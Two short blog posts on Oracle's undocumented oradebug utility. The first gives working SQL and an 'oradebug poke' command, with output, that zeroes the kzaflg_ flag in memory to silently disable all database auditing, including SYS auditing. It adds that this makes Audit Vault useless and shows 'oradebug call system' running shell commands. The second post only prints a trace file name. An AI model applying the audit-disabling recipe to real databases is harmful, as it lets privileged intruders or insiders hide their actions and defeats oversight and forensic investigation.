Disable Auditing Using Oradebug

in 2011 Laszlo Toth Show some Oracle tricks to disable Auditing In Oracle Database included with SYS auditing using simple command Called oradebug, Just as note oradebug is undocumented in all oracle versions and if you have sysdba role privileges you can do a lot of things with this command :

the below is the demonstration :

sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

Just as note with oradebug you Audit vault become useless. another tricks that we can use oradebug to call Database command using OS 🙂 

SQL> oradebug call system    “ls -la >/tmp/hacktivity.txt”

Thank you
Osama mustafa

ORADEBUG to Display Trace Name and Location

The Below Example Show you how I did it :

[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 10.2.0.5.0 – Production on Thu Nov 15 17:46:00 2012

Copyright (c) 1982, 2010, Oracle.  All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.5.0 – Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> oradebug setmypid
Statement processed.
SQL> alter database backup controlfile to trace; –any Statement to Generate Trace File.

Database altered.

SQL> oradebug tracefile_name
/u01/app/oracle/admin/orcl/udump/orcl_ora_6207.trc
SQL>

Thank you
Osama Mustafa